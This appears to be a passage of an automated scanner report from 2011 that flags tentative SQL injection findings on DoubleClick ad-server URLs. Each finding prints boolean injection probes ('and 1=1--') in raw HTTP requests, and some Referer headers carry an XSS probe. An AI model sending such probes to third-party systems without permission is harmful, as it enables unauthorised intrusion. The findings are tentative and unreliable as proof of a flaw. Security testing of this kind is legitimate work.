TmhMWEIxWWkwNU9URTBPVGt5T1RFME9URXdPRFEzb0FIRDh2M3NBN0lCRm5kM2R5NWhibVJ5YjJsa1kyVnVkSEpoYkM1amIyMjZBUWszTWpoNE9UQmZZWFBJQVFuYUFUeG9kSFJ3T2k4dmQzZDNMbUZ1WkhKdmFXUmpaVzUwY21Gc0xtTnZiUzloYm1SeWIybGtMV05sYm5SeVlXd3RaMjl2WjJ4bExXbHZMVEl3TVRHWUF0d1F3QUlFeUFLRjBzOEtxQU1CNkFPT0NPZ0Ryd2pvQS1nRTZBT1RDZlVEQUFBQXhJQUctLU9oaGY3Zzc2N0FBUSZudW09MSZzaWc9QUdpV3F0eVBaWERvZXFnV3YxME56X3lmX3pZd2h5MHVFUSZjbGllbnQ9Y2EtcHViLTk5MTQ5OTI5MTQ5MTA4NDcmYWR1cmw9Cg--/clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUY1Hkw5VHgyhvrSCoNeyiAbFdTk9nZW8sdXNhLHQsMTMwNTAzNDk2MjQ0MixjLDI4OTY3MCxwYyw2OTExMSxhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQVVBZmhldFJ1QjRCUUFBQUFLQ1ptUWxBbXBtWm1abVpDVUNhbVptWm1aa0pRRkZGSGxUV1BORU1Tc1lkYTZiMnppVTdPc2xOQUFBQUFCVWJBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0MxR0hJQVBoQUJBZ1VDQUFRQUFBQUFQQ0V2bUFBQUFBQS4vY25kPSFrUjdnZVFpX2tBTVF5TWtLR0FBZzBjY0JNQUE0dFRGQUFFaVdCVkFBV0FCZzJnRm9BSENzQW5qOFc0QUI5Z1NJQWFRVWtBRUJtQUVCb0FFRHFBRURzQUVCdVFFQUFBQ2dtWmtKUU1FQkFBQUFvSm1aQ1VESkFiamRRcENzejdrXzBBRUEvcmVmZXJyZX
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=0619192936'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 13:17:56 GMT
Content-Length: 3966

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1420759/lmb_iau_PassAgeBtnParkingLotCNP15s40k_Born_0311_728x90.swf";
var gif = "http://s0.2mdn.net/1420759/lmb_iau_PassAgeBtnParkingLotCNP15s40k_Born_0311_728x90.gif";
var minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/17/25/%2a/h%3B220264224%3B4-0%3B0%3B43807788%3B3454-728/90%3B41050720/41068507/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/80254/https://insurance.lowermybills.com/auto/?sourceid=43807788-220264224-41068507");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 728;
var winH = 90;
var winL = 0;
var winT = 0;
if(typeof(encodeURIComponent)=="function"){url=encodeURIComponent(unescape(url));}
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'"';
var bgo=(bg=="")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');if((openWindow=="center")&&window.screen){winL=Math.floor((screen.availWidth-winW)/2);winT=Math.floor((screen.availHeight-winH)/2);}window.open(unescape(url),id,"width="+winW+",height="+winH+",top="+winT+",left="+winL+",status=no,toolbar=no,menubar=no,location=no");}this.FSWin = FSWin;
ua=navigator.userAgent;
if(minV<=pVM&&(openWindow=="false"||(ua.indexOf("Mac")<0&&ua.indexOf("Opera")<0))){
   var adcode='<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="'+id+'"'+FWH+'>'+
       '<param name="movie" value="'+swf+'"><param name="flashvars" value='+fv+'><param name="quality" value="high"><param name="wmode" value="'+wmode+'"><param name="base" value="'+swf.substring(0,swf.lastIndexOf("/"))+'"><PARAM NAME="AllowScriptAccess" VALUE="'+dcallowscriptaccess+'">'+bgo+
       '<embed src="'+swf+'" flashvars='+fv+bge+FWH+' type="application/x-shockwave-flash" quality="high" swliveconnect="true" wmode="'+wmode+'" name="'+id+'" base="'+swf.substring(0,swf.lastIndexOf("/"))+'" AllowScriptAccess="'+dcallowscriptaccess+'"></embed></object>';
if((
...[SNIP]...

Request 2

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=0619192936'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 13:17:57 GMT
Content-Length: 4017

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1420759/lmb_iau_PassAgeBtnParkingLotCNP15s40k_Accid3Yr_0510_728x90.swf";
var gif = "http://s0.2mdn.net/1420759/lmb_iau_PassAgeBtnParkingLotCNP15s40k_Accid3Yr_0510_728x90.gif";
var minV = 6;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/17/25/%2a/u%3B220264224%3B0-0%3B0%3B43807788%3B3454-728/90%3B36993209/37011087/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/80254/https://insurance.lowermybills.com/auto/?sourceid=43807788-220264224-37011087");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 728;
var winH = 90;
var winL = 0;
var winT = 0;
if(typeof(encodeURIComponent)=="function"){url=encodeURIComponent(unescape(url));}
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'"';
var bgo=(bg=="")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false")&&(id=="DCF0"))alert('openWindow is wrong.');if((openWindow=="center")&&window.screen){winL=Math.floor((screen.availWidth-winW)/2);winT=Math.floor((screen.availHeight-winH)/2);}window.open(unescape(url),id,"width="+winW+",height="+winH+",top="+winT+",left="+winL+",status=no,toolbar=no,menubar=no,location=no");}this.FSWin = FSWin;
ua=navigator.userAgent;
if(minV<=pVM&&(openWindow=="false"||(ua.indexOf("Mac")<0&&ua.indexOf("Opera")<0))){
   var adcode='<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="'+id+'"'+FWH+'>'+
       '<param name="movie" value="'+swf+'"><param name="flashvars" value='+fv+'><param name="quality" value="high"><param name="wmode" value="'+wmode+'"><param name="base" value="'+swf.substring(0,swf.lastIndexOf("/"))+'"><PARAM NAME="AllowScriptAccess" VALUE="'+dcallowscriptaccess+'">'+bgo+
       '<embed src="'+swf+'" flashvars='+fv+bge+FWH+' type="application/x-shockwave-flash" quality="high" swliveconnect="true" wmode="'+wmode+'" name="'+id+'" base="'+swf.substring(0,swf.lastIndexOf("/"))+'" AllowScriptAccess="'+dcallowscriptaccess
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=;ord=628818073?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:21:20 GMT
Content-Length: 37981

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers = new Object();
if(typeof(dartMotifAds) == "undefined")
var dartMotifAds = new Array();
if(!self.dartLoadedGlobalTemplates_59_07) {
self.dartLoadedGlobalTemplates_59_07 = {};
}
if(self.dartLoadedGlobalTemplates_59_07["@GT_TYPE@"]) {
self.dartLoadedGlobalTemplates_59_07["@GT_TYPE@"].isLoaded = true;
}

function RichMediaCore_59_07() {
this.CREATIVE_TYPE_EXPANDING = "ExpandingFlash";
this.CREATIVE_TYPE_FLOATING = "FloatingFlash";
this.CREATIVE_TYPE_INPAGE = "InpageFlash";
this.CREATIVE_TYPE_INPAGE_WITH_FLOATING = "InpageFlashFloatingFlash";
this.CREATIVE_TYPE_FLOATING_WITH_REMINDER = "FloatingFlashReminderFlash";
this.CREATIVE_TYPE_INPAGE_WITH_OVERLAY = "InpageFlashOverlayFlash";
this.ASSET_TYPE_FLOATING = "Floating";
this.ASSET_TYPE_INPAGE = "Inpage";
this.ASSET_TYPE_EXPANDING = "Expanding";
this.ASSET_TYPE_REMINDER = "Reminder";
this.ASSET_TYPE_OVERLAY = "Overlay";
this.STANDARD_EVENT_DISPLAY_TIMER = "DISPLAY_TIMER";
this.STANDARD_EVENT_INTERACTION_TIMER = "INTERACTION_TIMER";
this.STANDARD_EVENT_INTERACTIVE_IMPRESSION = "EVENT_USER_INTERACTION";
this.STANDARD_EVENT_FULL_SCREEN_VIDEO_PLAYS = "";
this.STANDARD_EVENT_FULL_SCREEN_VIDEO_COMPLETES = "";
this.STANDARD_EVENT_FULL_SCREEN_AVERAGE_VIEW_TIME = "";
this.STANDARD_EVENT_MANUAL_CLOSE = "EVENT_MANUAL_CLOSE";
this.STANDARD_EVENT_BACKUP_IMAGE = "BACKUP_IMAGE_IMPRESSION";
this.STANDARD_EVENT_EXPAND_TIMER = "EXPAND_TIMER";
this.STANDARD_EVENT_VIDEO_PLAY = "EVENT_VIDEO_PLAY";
this.STANDARD_EVENT_VIDEO_VIEW_TIMER = "EVENT_VIDEO_VIEW_TIMER";
this.STANDARD_EVENT_VIDEO_VIEW_COMPLETE = "EVENT_VIDEO_COMPLETE";
this.STANDARD_EVENT_VIDEO_INTERACTION = "EVENT_VIDEO_INTERACTION";
this.STANDARD_EVENT_VIDEO_PAUSE = "EVENT_VIDEO_PAUSE";
this.STANDARD_EVENT_VIDEO_MUTE = "E
...[SNIP]...

Request 2

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=;ord=628818073?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:21:21 GMT
Content-Length: 7028

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Mar 17 11:27:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2493053/MAPS_728x90.swf";
var gif = "http://s0.2mdn.net/2493053/728x90_maps.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/1c8/%2a/n%3B235864053%3B2-0%3B0%3B59652986%3B3454-728/90%3B41213402/41231189/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/1c8/%2a/n%3B235864053%3B2-0%3B0%3B59652986%3B3454-728/90%3B41213402/41231189/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPs
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N6543.131803.TURN.COM/B5513576.10

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N6543.131803.TURN.COM/B5513576.10;sz=728x90;ord=7802162129868032033?;click=http://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/;'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 13:59:29 GMT
Content-Length: 6123

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3076801/CRM_728x90_gardenclub_clorox_outdoor.swf";
var gif = "http://s0.2mdn.net/3076801/CRM_728x90_gardenclub_clorox_outdoor.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/j%3B241010695%3B1-0%3B0%3B63775632%3B3454-728/90%3B42072487/42090274/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/http://www.homedepotgardenclub.com/SignUp/Registration.aspx?SourceID=714&cm_mmc=OLA|Carat|GardenClubQ2_2011|GC|Garden Club Generic");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/j%3B241010695%3B1-0%3B0%3B63775632%3B3454-728/90%3B42072487/42090274/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/http://www.homedepotgardenclub.com/SignUp/Registration.aspx?SourceID=714&cm_mmc=OLA|Carat|GardenClubQ2_2011|GC|Garden Club Generic");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag1";
ctv[1] = "";
ctp[2] = "clickTAG";
ctv[2] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/j%3B241010695%3B1-0%3B0%3B63775632%3B3454-728/90%3B42072487/42090274/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/" + ctVal);
}
if(ctParam.toLowerCa
...[SNIP]...

Request 2

GET /adi/N6543.131803.TURN.COM/B5513576.10;sz=728x90;ord=7802162129868032033?;click=http://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/;'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 13:59:30 GMT
Content-Length: 6099

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3076801/CRM_728x90_GC_diginto_joingc.swf";
var gif = "http://s0.2mdn.net/3076801/CRM_728x90_GC_diginto_joingc.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/d%3B241010695%3B0-0%3B0%3B63775632%3B3454-728/90%3B42072486/42090273/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/http://www.homedepotgardenclub.com/SignUp/Registration.aspx?SourceID=714&cm_mmc=OLA|Carat|GardenClubQ2_2011|GC|Garden Club Generic");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/d%3B241010695%3B0-0%3B0%3B63775632%3B3454-728/90%3B42072486/42090273/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/http://www.homedepotgardenclub.com/SignUp/Registration.aspx?SourceID=714&cm_mmc=OLA|Carat|GardenClubQ2_2011|GC|Garden Club Generic");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag1";
ctv[1] = "";
ctp[2] = "clickTAG";
ctv[2] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/7/3c/%2a/d%3B241010695%3B0-0%3B0%3B63775632%3B3454-728/90%3B42072486/42090273/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/" + ctVal);
}
if(ctParam.toLowerCase() == "clickta
...[SNIP]...

1.5. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/casio/cttech

Issue detail

The _eo parameter appears to be vulnerable to SQL injection attacks. The payloads 28613726'%20or%201%3d1--%20 and 28613726'%20or%201%3d2--%20 were each submitted in the _eo parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d1--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
